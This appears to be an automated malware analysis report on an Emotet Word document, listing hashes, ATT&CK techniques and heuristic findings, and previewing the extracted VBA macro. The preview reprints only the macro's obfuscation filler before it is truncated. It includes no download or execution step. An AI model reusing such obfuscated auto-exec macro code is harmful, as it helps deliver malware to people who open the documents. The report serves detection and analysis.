Emotet Office (OLE) malware analysis — malicious · d7fe6d5f88340db7

MALICIOUS

Office (OLE)

281.5 KB Created: 2019-10-11 12:46:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: da7a32d86a92513667c26ccb5c337197 SHA-1: 5cf7ae6647deff8eb8a9b6880dba83cfce4aa3a4 SHA-256: d7fe6d5f88340db74636f77dfda91ef267f7efb6c0befc4a56fcabcd4eee3c10

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Microsoft Word document containing obfuscated VBA macros, specifically an AutoOpen macro. Heuristics indicate it acts as a loader that uses GetObject and Shell execution to download and execute a second-stage payload. The ClamAV signature 'Doc.Downloader.Emotet-7330271-0' strongly suggests the Emotet family.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7330271-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7330271-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83011 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	83011 bytes
SHA-256: `2f70eea2a10baadbb674cc745b438e15ce1e37f0dd451152dc649212678bcefe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c5x464380577" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b100791850x, 0, 0, MSForms, TextBox" Attribute VB_Control = "x0b05200c00, 1, 1, MSForms, TextBox" Attribute VB_Control = "c03505c991c1, 2, 2, MSForms, TextBox" Attribute VB_Control = "b10431b7250, 3, 3, MSForms, TextBox" Attribute VB_Control = "c37021c0x1764, 4, 4, MSForms, TextBox" Attribute VB_Control = "b7x09783522, 5, 5, MSForms, TextBox" Attribute VB_Name = "bc9850999c4" Function b1c42c65025() On Error Resume Next 'Central320 DuBuque Valley, Kayleighhaven, Anguilla National60941 Grant Harbor, West Vestahaven, Madagascar x2809x0c0c2 = Rnd(x10b0060001c7 * ChrB(504)) + Log(876) 'Legacy7581 Boyer Branch, South Evanburgh, Macedonia National691 Nat Bypass, Murrayport, Holy See (Vatican City State) b64044bc3b1 = Rnd(bccx59100070 * ChrB(691)) + Log(575) 'Dynamic321 Koepp Spring, Wardborough, Montserrat Investor79775 Brock Road, Buckridgeport, British Indian Ocean Territory (Chagos Archipelago) x440bc07302 = Rnd(cb5x81169819 * ChrB(756)) + Log(519) 'Regional84310 Julius Haven, Vivienberg, Ecuador Customer896 Howard Rest, Ryanview, Tunisia x070c3c0902c6 = Rnd(c490c10300808 * ChrB(850)) + Log(426) 'Dynamic88647 Duane Estate, Lake Irma, Saint Lucia Direct16290 Pacocha Mills, South Elmira, Montserrat xb150000cc3c3 = Rnd(b808026005157 * ChrB(548)) + Log(179) 'Global162 Schoen Branch, Jacobibury, Togo Regional857 Frami Cliff, Lake Guadalupemouth, New Zealand b620910b7xx5 = Rnd(cb5015xxx8582 * ChrB(513)) + Log(951) 'International09048 Green Oval, Nathanaeltown, Jamaica Internal30314 Daniella Glen, North Nick, Portugal b4cb9700405 = Rnd(x800x0049834 * ChrB(254)) + Log(199) 'Senior00187 George Greens, Lake Jamison, Switzerland Investor523 Ulises Club, West Dusty, Suriname 'Customer32336 Cecelia Haven, Lake Susannaville, Finland District1708 Langworth Passage, Kyleberg, Ukraine b85x05x08040 = Rnd(xb09050398825 * ChrB(846)) + Log(952) 'Lead77351 Jerel Harbor, Damionshire, Bulgaria Chief57639 Zelda Tunnel, Fatimashire, Guinea c081x31006b61 = Rnd(b10x18985x9 * ChrB(122)) + Log(93) 'International15485 Ezekiel Pine, Joannytown, Kyrgyz Republic Chief42204 Blick Plaza, West Silas, Madagascar c48x4b0b96170 = Rnd(x0073824654 * ChrB(874)) + Log(76) 'Dynamic576 Shields Landing, Reinholdfurt, Saint Vincent and the Grenadines Central46479 Nicola Drive, Declanport, San Marino xc1212b30bc = Rnd(c986524648b * ChrB(926)) + Log(726) 'Regional10852 O'Conner Tunnel, West Laceymouth, Armenia Future451 Sanford Square, Port Darrel, Niue x60c6x0006304 = Rnd(c3905287000 * ChrB(170)) + Log(411) 'Human7209 Rutherford Islands, Gutmannbury, Hungary Central76757 Adrien Trace, Moorebury, Somalia b06bc4x6396b1 = Rnd(x38b728x038 * ChrB(695)) + Log(696) 'Global361 Kihn Walks, Dakotafort, Sri Lanka Corporate990 Gracie Keys, Port Furman, Uganda c1170x3cx100 = Rnd(b8181x745307 * ChrB(399)) + Log(486) 'Dynamic33589 Ona Shore, Port Hayley, Bouvet Island (Bouvetoya) Chief4772 Batz Tunnel, Cristianview, Switzerland 'Central85884 Larson Skyway, South Ludwig, China Human0013 Stiedemann Brook, Lake Merrittberg, Virgin Islands, U.S. x9c263073b1 = Rnd(c8x05004287 * ChrB(512)) + Log(587) 'Corporate874 Bernier Creek, Crystalborough, Bulgaria Customer8112 Roman Parks, Rosamondbury, Nigeria c80cb83803914 = Rnd(x06620b501x0 * ChrB(696)) + Log(547) 'Chief9695 Cindy Highway, Marvintown, Albania National47768 Pacocha Views, West Ritatown, Gabon cb798818c07c = Rnd(x37x95c5bx2 * ChrB(700)) + Log(665) 'Product960 Travon Mountains, East Thelmabury, Venezuela Central9914 Schuppe Course, East Janicehaven, Cambodia xb0b96xx2b50 = Rnd(b870c20c570 * ChrB(116)) + Log(955) 'Lead28507 Morissette Glen, New Lesliefurt, Pitcairn Islands Customer409 Lilian Plaza, West Jillian, Cuba b20657x0610 = Rnd(bxx1b22c706b * ChrB(733)) + ... (truncated)

SHA-256: 2f70eea2a10baadbb674cc745b438e15ce1e37f0dd451152dc649212678bcefe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c5x464380577"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b100791850x, 0, 0, MSForms, TextBox"
Attribute VB_Control = "x0b05200c00, 1, 1, MSForms, TextBox"
Attribute VB_Control = "c03505c991c1, 2, 2, MSForms, TextBox"
Attribute VB_Control = "b10431b7250, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c37021c0x1764, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b7x09783522, 5, 5, MSForms, TextBox"

Attribute VB_Name = "bc9850999c4"
Function b1c42c65025()
On Error Resume Next
   'Central320 DuBuque Valley, Kayleighhaven, Anguilla National60941 Grant Harbor, West Vestahaven, Madagascar
x2809x0c0c2 = Rnd(x10b0060001c7 * ChrB(504)) + Log(876)
'Legacy7581 Boyer Branch, South Evanburgh, Macedonia National691 Nat Bypass, Murrayport, Holy See (Vatican City State)
b64044bc3b1 = Rnd(bccx59100070 * ChrB(691)) + Log(575)
'Dynamic321 Koepp Spring, Wardborough, Montserrat Investor79775 Brock Road, Buckridgeport, British Indian Ocean Territory (Chagos Archipelago)
x440bc07302 = Rnd(cb5x81169819 * ChrB(756)) + Log(519)
'Regional84310 Julius Haven, Vivienberg, Ecuador Customer896 Howard Rest, Ryanview, Tunisia
x070c3c0902c6 = Rnd(c490c10300808 * ChrB(850)) + Log(426)
'Dynamic88647 Duane Estate, Lake Irma, Saint Lucia Direct16290 Pacocha Mills, South Elmira, Montserrat
xb150000cc3c3 = Rnd(b808026005157 * ChrB(548)) + Log(179)
'Global162 Schoen Branch, Jacobibury, Togo Regional857 Frami Cliff, Lake Guadalupemouth, New Zealand
b620910b7xx5 = Rnd(cb5015xxx8582 * ChrB(513)) + Log(951)
'International09048 Green Oval, Nathanaeltown, Jamaica Internal30314 Daniella Glen, North Nick, Portugal
b4cb9700405 = Rnd(x800x0049834 * ChrB(254)) + Log(199)
'Senior00187 George Greens, Lake Jamison, Switzerland Investor523 Ulises Club, West Dusty, Suriname
'Customer32336 Cecelia Haven, Lake Susannaville, Finland District1708 Langworth Passage, Kyleberg, Ukraine
b85x05x08040 = Rnd(xb09050398825 * ChrB(846)) + Log(952)
'Lead77351 Jerel Harbor, Damionshire, Bulgaria Chief57639 Zelda Tunnel, Fatimashire, Guinea
c081x31006b61 = Rnd(b10x18985x9 * ChrB(122)) + Log(93)
'International15485 Ezekiel Pine, Joannytown, Kyrgyz Republic Chief42204 Blick Plaza, West Silas, Madagascar
c48x4b0b96170 = Rnd(x0073824654 * ChrB(874)) + Log(76)
'Dynamic576 Shields Landing, Reinholdfurt, Saint Vincent and the Grenadines Central46479 Nicola Drive, Declanport, San Marino
xc1212b30bc = Rnd(c986524648b * ChrB(926)) + Log(726)
'Regional10852 O'Conner Tunnel, West Laceymouth, Armenia Future451 Sanford Square, Port Darrel, Niue
x60c6x0006304 = Rnd(c3905287000 * ChrB(170)) + Log(411)
'Human7209 Rutherford Islands, Gutmannbury, Hungary Central76757 Adrien Trace, Moorebury, Somalia
b06bc4x6396b1 = Rnd(x38b728x038 * ChrB(695)) + Log(696)
'Global361 Kihn Walks, Dakotafort, Sri Lanka Corporate990 Gracie Keys, Port Furman, Uganda
c1170x3cx100 = Rnd(b8181x745307 * ChrB(399)) + Log(486)
'Dynamic33589 Ona Shore, Port Hayley, Bouvet Island (Bouvetoya) Chief4772 Batz Tunnel, Cristianview, Switzerland
   'Central85884 Larson Skyway, South Ludwig, China Human0013 Stiedemann Brook, Lake Merrittberg, Virgin Islands, U.S.
x9c263073b1 = Rnd(c8x05004287 * ChrB(512)) + Log(587)
'Corporate874 Bernier Creek, Crystalborough, Bulgaria Customer8112 Roman Parks, Rosamondbury, Nigeria
c80cb83803914 = Rnd(x06620b501x0 * ChrB(696)) + Log(547)
'Chief9695 Cindy Highway, Marvintown, Albania National47768 Pacocha Views, West Ritatown, Gabon
cb798818c07c = Rnd(x37x95c5bx2 * ChrB(700)) + Log(665)
'Product960 Travon Mountains, East Thelmabury, Venezuela Central9914 Schuppe Course, East Janicehaven, Cambodia
xb0b96xx2b50 = Rnd(b870c20c570 * ChrB(116)) + Log(955)
'Lead28507 Morissette Glen, New Lesliefurt, Pitcairn Islands Customer409 Lilian Plaza, West Jillian, Cuba
b20657x0610 = Rnd(bxx1b22c706b * ChrB(733)) +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.